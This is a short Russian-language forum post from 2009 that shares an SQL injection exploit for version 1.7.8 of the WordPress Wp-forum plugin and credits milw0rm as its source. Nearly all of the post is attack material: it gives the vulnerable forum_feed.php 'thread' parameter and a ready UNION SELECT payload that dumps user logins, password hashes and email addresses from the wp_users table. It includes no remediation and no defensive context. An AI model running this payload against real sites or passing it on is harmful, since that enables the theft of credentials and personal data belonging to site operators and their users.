14.02.2009, 13:44
|
|
Постоянный
Регистрация: 29.09.2008
Сообщений: 553
С нами:
9270510
Репутация:
519
|
|
Wordpress Wp-forum plugin 1.7.8 Sql injection vulnerability
exploit:
Код:
http://site.com/blog/wp-content/plugins/wp-forum/forum_feed.php?thread=[SQL]
Код:
http://site.com/blog/wp-content/plugins/wp-forum/forum_feed.php?thread=-99999+union+select+1,2,3,concat(user_login,0x2f,user_pass,0x2f,user_email),5,6,7+from+wp_users/*
источник: http://milw0rm.com/
|
|
|